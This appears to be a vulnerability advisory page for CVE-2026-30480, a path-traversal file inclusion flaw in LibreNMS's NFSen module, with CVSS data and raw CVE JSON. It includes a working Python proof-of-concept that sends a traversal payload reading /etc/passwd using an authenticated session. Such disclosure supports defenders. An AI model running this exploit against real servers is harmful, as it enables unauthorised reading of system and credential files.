Security Vulnerability Report
CVE-2026-30480 CVSS 6.5 MEDIUM

Published: 2026-04-14 15:16:27
Last Modified: 2026-04-17 15:24:58

Description

A Local File Inclusion (LFI) vulnerability in the NFSen module (nfsen.inc.php) of LibreNMS 22.11.0-23-gd091788f2 allows authenticated attackers to include arbitrary PHP files from the server filesystem via path traversal sequences in the nfsen parameter.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

LibreNMS 22.11.0-23-gd091788f2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target configuration
target_url = "http://target-ip/librenms/html/pages/nfsen.inc.php"

# Attacker needs valid session cookie (Authentication required: PR:L)
session_cookie = "PHPSESSID=attacker_valid_session_id_here"

# Headers
headers = {
    "Cookie": session_cookie,
    "User-Agent": "CVE-2026-30480-Scanner/1.0"
}

# Payload exploiting path traversal in 'nfsen' parameter
# Attempting to include a sensitive file (e.g., /etc/passwd or a config file)
# Note: The vulnerability description specifies including PHP files,
# but LFI often allows reading other file types depending on PHP config.
payload_params = {
    "nfsen": "../../../../../../../../etc/passwd"
}

try:
    response = requests.get(target_url, params=payload_params, headers=headers, timeout=10)

    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response Content (Snippet):")
        print(response.text[:500])  # Print first 500 chars to verify inclusion
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except requests.exceptions.RequestException as e:
    print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30480", "sourceIdentifier": "[email protected]", "published": "2026-04-14T15:16:27.337", "lastModified": "2026-04-17T15:24:57.753", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Local File Inclusion (LFI) vulnerability in the NFSen module (nfsen.inc.php) of LibreNMS 22.11.0-23-gd091788f2 allows authenticated attackers to include arbitrary PHP files from the server filesystem via path traversal sequences in the nfsen parameter."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://github.com/parlakbarann/CVE-2026-30480", "source": "[email protected]"}, {"url": "https://github.com/parlakbarann/CVE-2026-30480", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}